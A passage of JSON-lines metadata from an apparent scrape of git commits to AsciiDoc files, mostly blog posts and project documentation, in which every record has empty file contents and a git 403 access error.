csearch,avikurapati\/elasticsearch,umeshdangat\/elasticsearch,gfyoung\/elasticsearch,awislowski\/elasticsearch,winstonewert\/elasticsearch,Stacey-Gammon\/elasticsearch,fforbeck\/elasticsearch,spiegela\/elasticsearch,Shepard1212\/elasticsearch,artnowo\/elasticsearch,Stacey-Gammon\/elasticsearch,MisterAndersen\/elasticsearch,strapdata\/elassandra5-rc,mikemccand\/elasticsearch,naveenhooda2000\/elasticsearch,coding0011\/elasticsearch,IanvsPoplicola\/elasticsearch,camilojd\/elasticsearch,Shepard1212\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,qwerty4030\/elasticsearch,JSCooke\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,henakamaMSFT\/elasticsearch,spiegela\/elasticsearch,a2lin\/elasticsearch,sreeramjayan\/elasticsearch,nknize\/elasticsearch,obourgain\/elasticsearch,HonzaKral\/elasticsearch,Shepard1212\/elasticsearch,artnowo\/elasticsearch,henakamaMSFT\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,camilojd\/elasticsearch,rlugojr\/elasticsearch,umeshdangat\/elasticsearch,lks21c\/elasticsearch,spiegela\/elasticsearch,zkidkid\/elasticsearch,jprante\/elasticsearch,C-Bish\/elasticsearch,mohit\/elasticsearch,i-am-Nathan\/elasticsearch,yanjunh\/elasticsearch,sneivandt\/elasticsearch,yanjunh\/elasticsearch,camilojd\/elasticsearch,naveenhooda2000\/elasticsearch,LewayneNaidoo\/elasticsearch,masaruh\/elasticsearch,JackyMai\/elasticsearch,geidies\/elasticsearch,lks21c\/elasticsearch,gmarz\/elasticsearch,winstonewert\/elasticsearch,jimczi\/elasticsearch,nilabhsagar\/elasticsearch,JackyMai\/elasticsearch,ricardocerq\/elasticsearch,rlugojr\/elasticsearch,alexshadow007\/elasticsearch,ricardocerq\/elasticsearch,Helen-Zhao\/elasticsearch,LewayneNaidoo\/elasticsearch,bawse\/elasticsearch,ricardocerq\/elasticsearch,palecur\/elasticsearch,naveenhooda2000\/elasticsearch,a2lin\/elasticsearch,gmarz\/elasticsearch,geidies\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,nazarewk\/elasticsearch,ZTE-PaaS\/elasticsearch,gfyoung\/elasticsearch,C-Bish\/elasticsearch,gingerwizard\/elasticsearch,wuranbo\/elasticsearch,
gingerwizard\/elasticsearch,dpursehouse\/elasticsearch,myelin\/elasticsearch,maddin2016\/elasticsearch,winstonewert\/elasticsearch,nknize\/elasticsearch,avikurapati\/elasticsearch,dongjoon-hyun\/elasticsearch,GlenRSmith\/elasticsearch,mikemccand\/elasticsearch,fernandozhu\/elasticsearch,fforbeck\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,cwurm\/elasticsearch,gingerwizard\/elasticsearch,a2lin\/elasticsearch,lks21c\/elasticsearch,fred84\/elasticsearch,zkidkid\/elasticsearch,avikurapati\/elasticsearch,wangtuo\/elasticsearch,nomoa\/elasticsearch,dongjoon-hyun\/elasticsearch,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,awislowski\/elasticsearch,markwalkom\/elasticsearch,MisterAndersen\/elasticsearch,vroyer\/elasticassandra,jimczi\/elasticsearch,girirajsharma\/elasticsearch,wangtuo\/elasticsearch,cwurm\/elasticsearch,girirajsharma\/elasticsearch,Helen-Zhao\/elasticsearch,sneivandt\/elasticsearch,nilabhsagar\/elasticsearch,wenpos\/elasticsearch,MaineC\/elasticsearch,brandonkearby\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,ZTE-PaaS\/elasticsearch,alexshadow007\/elasticsearch,gingerwizard\/elasticsearch,obourgain\/elasticsearch,scottsom\/elasticsearch,elasticdog\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,palecur\/elasticsearch,mortonsykes\/elasticsearch,henakamaMSFT\/elasticsearch,dpursehouse\/elasticsearch,scorpionvicky\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,trangvh\/elasticsearch,nilabhsagar\/elasticsearch,njlawton\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,wuranbo\/elasticsearch,nazarewk\/elasticsearch,kalimatas\/elasticsearch,strapdata\/elassandra5-rc,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,maddin2016\/elasticsearch,dpursehouse\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,C-Bish\/elasticsearch,palecur\/elasticsearch,palecur\/elasticsearch,maddin2016\/elasticsearch,njlawton\/elasticsearch,mjason3\/elasticsearch,JervyShi\/elasticsearch,mortonsykes\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,JackyMai\/elasticsearch,mohit\/elasticsearch","old_file":"docs\/reference\/aggregations\/metrics\/tophits-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/metrics\/tophits-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22ffd152b15eb7991f349e1467c29f797030dd4c","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98e670b5eb4e045f96c5105493cc14efa1b2aaad","subject":"Update 2016-01-18-md5-crack-tool.adoc","message":"Update 
2016-01-18-md5-crack-tool.adoc","repos":"buchedan\/buchedan.github.io,buchedan\/buchedan.github.io,buchedan\/buchedan.github.io","old_file":"_posts\/2016-01-18-md5-crack-tool.adoc","new_file":"_posts\/2016-01-18-md5-crack-tool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/buchedan\/buchedan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef7c7505efe0ec49172c5e7b7161aa9f4eedd262","subject":"Update 2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","message":"Update 2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","repos":"LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Rackcore\/Rackcore.github.io,Rackcore\/Rackcore.github.io,AlonsoCampos\/AlonsoCampos.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,Rackcore\/Rackcore.github.io,AlonsoCampos\/AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io","old_file":"_posts\/2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","new_file":"_posts\/2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Desarrollo-FullStack\/Desarrollo-FullStack.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b84cf09e84d1e824a36b87712752bd45c46221c","subject":"Update 2016-07-16-Welcome-to-Integral-Morphology.adoc","message":"Update 2016-07-16-Welcome-to-Integral-Morphology.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-16-Welcome-to-Integral-Morphology.adoc","new_file":"_posts\/2016-07-16-Welcome-to-Integral-Morphology.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f859d281481eb6953faa693b10f2ce3cae77bd0e","subject":"Draft of adding new devices","message":"Draft of adding new devices","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/adding-new-devices.adoc","new_file":"modules\/adding-new-devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ac8a256c3378188f193f36d03504f5a07320978","subject":"add core.async blog post","message":"add core.async blog post\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2013\/06\/28\/clojure-clore-async-channels.adoc","new_file":"content\/news\/2013\/06\/28\/clojure-clore-async-channels.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 
403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"814ee51a45953aadfd851dda1ab8fe32a9ac6a7c","subject":"Update 2016-02-14-Over-rendering-with-staggered-alpha-values.adoc","message":"Update 2016-02-14-Over-rendering-with-staggered-alpha-values.adoc","repos":"marksubbarao\/hubpress.io,marksubbarao\/hubpress.io,marksubbarao\/hubpress.io,marksubbarao\/hubpress.io","old_file":"_posts\/2016-02-14-Over-rendering-with-staggered-alpha-values.adoc","new_file":"_posts\/2016-02-14-Over-rendering-with-staggered-alpha-values.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marksubbarao\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03f69c52154e40b3cf8b80d9fad30202d991a10d","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"443faa2fb0b6870b423a18b4a417b5db54d3e9c1","subject":"Added correct docs name for docs file in Camel-plc4x","message":"Added correct docs name for docs file in Camel-plc4x\n\nSigned-off-by: Andrea Cosentino <cdba4b3ecd9bd0b77c9c6c6fb10023f62236650e@gmail.com>\n","repos":"christophd\/camel,tadayosi\/camel,tadayosi\/camel,christophd\/camel,christophd\/camel,apache\/camel,apache\/camel,christophd\/camel,tadayosi\/camel,tadayosi\/camel,tadayosi\/camel,apache\/camel,apache\/camel,apache\/camel,apache\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel","old_file":"components\/camel-plc4x\/src\/main\/docs\/plc4x-component.adoc","new_file":"components\/camel-plc4x\/src\/main\/docs\/plc4x-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0fc270bcfd1d8f85de67dd380d813a8a6fb75c2","subject":"Update 2015-03-20-Le-commencement.adoc","message":"Update 2015-03-20-Le-commencement.adoc","repos":"Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io","old_file":"_posts\/2015-03-20-Le-commencement.adoc","new_file":"_posts\/2015-03-20-Le-commencement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fendi-project\/fendi-project.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70ca078aa954ff65394de000c3a8c2c523efe55d","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee8dfac5e354edd3cd071be01981429623a8df6a","subject":"Update 2016-12-01-Mediashare-Chat.adoc","message":"Update 2016-12-01-Mediashare-Chat.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Mediashare-Chat.adoc","new_file":"_posts\/2016-12-01-Mediashare-Chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54114df2c48d1d49dd9271e0519d57991ed97cb8","subject":"Update 2016-10-02-about-crotel-studio.adoc","message":"Update 2016-10-02-about-crotel-studio.adoc","repos":"crotel\/studio,crotel\/studio,crotel\/studio,crotel\/studio","old_file":"_posts\/2016-10-02-about-crotel-studio.adoc","new_file":"_posts\/2016-10-02-about-crotel-studio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/studio.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3faff3d49324dfbb1cc8ec5168fa6275638e7aef","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af70b809037f2a7db7099b31320c1d6efaa13275","subject":"Update 2015-02-24-change-1.adoc","message":"Update 2015-02-24-change-1.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-change-1.adoc","new_file":"_posts\/2015-02-24-change-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03de352baeb979e031b8c3117d8f50438005baf0","subject":"Update 2016-11-05-Saturday.adoc","message":"Update 2016-11-05-Saturday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Saturday.adoc","new_file":"_posts\/2016-11-05-Saturday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01cb35b730047c31d49bc57e84084ac444635bb7","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 
2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0f3910131ee277c6b255cc7025f7a882e53aa09","subject":"Update 2017-09-20-Domain-Name-Terms-as-coding-analogy.adoc","message":"Update 2017-09-20-Domain-Name-Terms-as-coding-analogy.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-20-Domain-Name-Terms-as-coding-analogy.adoc","new_file":"_posts\/2017-09-20-Domain-Name-Terms-as-coding-analogy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d9f3d62fb3ca5c731d12a49ada97c4269dc6493","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c16690407aa5b06d8c135d2f4750dccfa764ba1e","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c91900cca51a01defd790c230e631738732d16ac","subject":"Update 2016-07-23-Lemplacement-des-villages-Wisigoths-du-Razes-et-lanalyse-cartographique.adoc","message":"Update 2016-07-23-Lemplacement-des-villages-Wisigoths-du-Razes-et-lanalyse-cartographique.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-23-Lemplacement-des-villages-Wisigoths-du-Razes-et-lanalyse-cartographique.adoc","new_file":"_posts\/2016-07-23-Lemplacement-des-villages-Wisigoths-du-Razes-et-lanalyse-cartographique.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"287c4cf6f319348a83a476984adf6c4568bfcad4","subject":"add test doc for docid","message":"add test doc for 
docid\n","repos":"rillbert\/giblish,rillbert\/giblish,rillbert\/giblish","old_file":"data\/testdocs\/wellformed\/docidtest\/docid_1.adoc","new_file":"data\/testdocs\/wellformed\/docidtest\/docid_1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rillbert\/giblish.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8186ce7490bf2169bb9df9fbab78efd4a51c9bb7","subject":"Fmt code","message":"Fmt code\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8002f2680fbaa30402c3005b27007a897522609","subject":"Deleted _posts\/2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","message":"Deleted _posts\/2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","new_file":"_posts\/2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fb6bffb362128df6240b783bcffe05d980fced6","subject":"Update 2016-02-09-Esfera-en-OpenGl-ES-20-Android.adoc","message":"Update 2016-02-09-Esfera-en-OpenGl-ES-20-Android.adoc","repos":"acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io","old_file":"_posts\/2016-02-09-Esfera-en-OpenGl-ES-20-Android.adoc","new_file":"_posts\/2016-02-09-Esfera-en-OpenGl-ES-20-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acien101\/acien101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58e7285117d028d24add57681d11403be072d2a5","subject":"Update 2018-07-23-Running-Tasks-Based-on-Public-Holidays.adoc","message":"Update 2018-07-23-Running-Tasks-Based-on-Public-Holidays.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2018-07-23-Running-Tasks-Based-on-Public-Holidays.adoc","new_file":"_posts\/2018-07-23-Running-Tasks-Based-on-Public-Holidays.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"603811cb05d50ac2aec5c8e4f879d841d396f6ed","subject":"Update 2017-02-23-Second-Podcast-Episode.adoc","message":"Update 2017-02-23-Second-Podcast-Episode.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-02-23-Second-Podcast-Episode.adoc","new_file":"_posts\/2017-02-23-Second-Podcast-Episode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned 
error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2252e2b54e27d39f58d661dba1f420691664aa38","subject":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","message":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a529f0710988d962d17e8afde6c919a16869e256","subject":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","message":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb3e9d0d3d8025c6f3e21f1ac021e073435350fd","subject":"Adding release notes for release of revapi_build coverage revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin revapi_site","message":"Adding release notes for release of revapi_build coverage revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin revapi_site\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20211011-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20211011-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"94b5fb3b71d1b7e9764fcfe29b30ae22d03f8e43","subject":"Update 2017-03-12-VIELVERSPRECHENDE-UNERWARTBARKEIT.adoc","message":"Update 2017-03-12-VIELVERSPRECHENDE-UNERWARTBARKEIT.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-03-12-VIELVERSPRECHENDE-UNERWARTBARKEIT.adoc","new_file":"_posts\/2017-03-12-VIELVERSPRECHENDE-UNERWARTBARKEIT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97c1a2a61b97cd791796eb88c6cbc53c144d72ee","subject":"add iot tenant cleanup design doc (#3149)","message":"add iot tenant cleanup design doc (#3149)\n\nSigned-off-by: Jean-Baptiste Trystram 
<2a64d2384370d3a99f70d1bb9b527fa9908532fd@redhat.com>","repos":"EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/design\/proposals\/iot-tenant-data-cleaner.adoc","new_file":"documentation\/design\/proposals\/iot-tenant-data-cleaner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6554dc8e9a959664dafb00a29e75f23b1cdc8ad7","subject":"Update 2017-03-13-Handley-Lodge-Captures-the-Travel-Gavel.adoc","message":"Update 2017-03-13-Handley-Lodge-Captures-the-Travel-Gavel.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-03-13-Handley-Lodge-Captures-the-Travel-Gavel.adoc","new_file":"_posts\/2017-03-13-Handley-Lodge-Captures-the-Travel-Gavel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"395336b5e9dc6e356f4ef78811c975d33aebb8a6","subject":"add all-in-one docs","message":"add all-in-one docs\n","repos":"the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers","old_file":"docs\/all-in-one\/all-in-one.asciidoc","new_file":"docs\/all-in-one\/all-in-one.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the1forte\/crunchy-containers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef5bbaa77a6132906ffff9d769564eb04c7b5f8b","subject":"Update 2015-02-12-Eigene-Fehlerseiten-unter-Joomla-or-Error-404.adoc","message":"Update 